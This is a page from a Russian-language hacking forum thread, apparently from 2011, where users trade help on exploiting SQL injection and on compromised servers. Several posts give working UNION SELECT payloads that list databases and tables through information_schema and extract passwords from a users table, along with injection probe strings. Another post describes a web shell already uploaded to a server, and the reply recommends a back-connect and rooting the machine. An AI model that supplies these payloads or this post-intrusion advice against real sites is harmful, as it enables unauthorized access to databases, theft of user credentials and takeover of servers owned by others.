HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16301  
Старый 07.02.2011, 22:36
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685

Репутация: 340


Отправить сообщение для Fooog с помощью ICQ Отправить сообщение для Fooog с помощью AIM Отправить сообщение для Fooog с помощью Yahoo
По умолчанию

Вот. Нашел на свой вопрос удобный ответ. Товарищ помог

group_concat(char(0x3C,0x62,0x72,0x3E),TABLE_NAME)

Вдруг кому понадобиться.
 
Ответить с цитированием

  #16302  
Старый 08.02.2011, 19:25
Ne1c
Guest
Сообщений: n/a
Провел на форуме:
555

Репутация: 0
По умолчанию

А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.

Как это сделать ?
 
Ответить с цитированием

  #16303  
Старый 08.02.2011, 19:30
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

Цитата:
Сообщение от Ne1c  
Ne1c said:
А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.
Как это сделать ?
1) Узнаем имеющиеся БД:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]union select 1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]schema_name[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]schemata[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR
2) Узнаем таблицы из определенной БД

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]select 1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables where table_schema[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'test'[/COLOR][/COLOR
3) Выводим данные из определенной БД:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]union select 1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]password from test[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]users[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR
 
Ответить с цитированием

  #16304  
Старый 08.02.2011, 19:32
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ne1c  
Ne1c said:
А как можно переключать БД в Скуле например есть 4 БД, я сейчас нахожусь в 1-ой, а мне надо перейти в 3-ю.
Как это сделать ?
1) Если не известно название БД, то узнать его можно таким запросом

Код:
Code:
Select table_schema from information_schema.tables where table_name = {Нужный_тебе_столбец}
2) Если известно, то "переключиться" можно так

Код:
Code:
Select Нужная_тебе_информация from table_schema.Нужный_тебе_столбец
Где table_schema - название необходимой БД
 
Ответить с цитированием

  #16305  
Старый 09.02.2011, 08:51
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

подскажите

http://databases.about.com/od/security/a/sql_inject_test.htm

в этой статье говорится

Цитата:
Сообщение от None  
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
бла-бла

Цитата:
Сообщение от None  
If you receive either one of the two errors above, your application is vulnerable to SQL injection attack!
у меня тоже такая ошибка вылезла

но только model=pr11'&(другие параметры)

пробовал

Цитата:
Сообщение от None  
model=pr11'+and+1=1+--+&(другие параметры)
model=pr11'+order+by+1+--+&(другие параметры)
model=pr11+order+by+1+--+&(другие параметры)
model=pr11+order+by+1/*&(другие параметры)
не помогает ошибка так и осталась

каким способом можно еще проверить?
 
Ответить с цитированием

  #16306  
Старый 09.02.2011, 14:39
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Эта ошибка совсем не является однозначным показателем присутствия скули.

Также она может получаться, например, при конфликте кодировок (обычно бывает уже непосредственно при выводе)

В твоем случае я бы поставил, что скули нет.
 
Ответить с цитированием

  #16307  
Старый 09.02.2011, 16:17
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию

Цитата:
Сообщение от noviyuser  
noviyuser said:
подскажите
http://databases.about.com/od/security/a/sql_inject_test.htm
в этой статье говорится
бла-бла
у меня тоже такая ошибка вылезла
но только model=pr11'&(другие параметры)
пробовал
не помогает ошибка так и осталась
каким способом можно еще проверить?
покажи что за ошибки выдаёт и при каких запросах

просто в запросах могут быть например скобки, а ты комментируешь закрывающие. Поэтому я всегда смотрю id=1+and+1=1 или id=1'+and+'1'='1, т.к. работает внезависимости от скобок
 
Ответить с цитированием

  #16308  
Старый 09.02.2011, 21:41
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

У него лишь 500 ошибка, что бы он не подставлял.
 
Ответить с цитированием

  #16309  
Старый 09.02.2011, 23:21
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28895

Репутация: 4
По умолчанию

Залил шелл, залажу в корень, в точку монтирования (/mnt), вижу отображение всего, что нужно а вот слить не могу, в чем проблема? или надо делать бекконнект, и рутать серв?

P/S права на чтение папки есть ...
 
Ответить с цитированием

  #16310  
Старый 09.02.2011, 23:26
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Прав на файлы м.б. не хватает? Т.е. на папку права есть, а на содержимое ее нет.

Лучше рутай, если получится.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ